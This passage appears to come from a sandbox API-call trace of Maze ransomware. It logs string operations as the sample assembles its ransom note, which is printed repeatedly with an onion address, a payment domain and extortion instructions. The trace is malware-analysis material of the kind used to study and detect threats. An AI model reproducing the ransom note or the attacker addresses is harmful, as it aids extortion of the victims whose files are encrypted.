lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0051.695] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0051.695] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0051.695] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0051.695] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0051.696] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0051.696] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42", lpString2="\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" [0051.696] lstrlenW (lpString="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned 2045 [0051.696] lstrlenW (lpString="9cda09f29c354b42") returned 16 [0051.696] StrStrW (lpFirst="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", lpSrch="%USERID%") returned="%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" [0051.696] VirtualAlloc (lpAddress=0x0, dwSize=0x101e, flAllocationType=0x3000, flProtect=0x4) returned 0xf80000 [0051.696] lstrcpynW (in: lpString1=0xf80000, lpString2="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/%USERID%\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", iMaxLength=1100 | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/" [0051.696] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/", lpString2="9cda09f29c354b42" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42" [0051.696] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42", lpString2="\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" [0051.697] VirtualFree (lpAddress=0xf70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.697] lstrlenW (lpString="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned 2053 [0051.697] lstrlenW (lpString="9cda09f29c354b42") returned 16 [0051.697] StrStrW (lpFirst="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", lpSrch="%USERID%") returned 0x0 [0051.697] lstrlenW (lpString="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n") returned 2053 [0051.697] lstrlenW 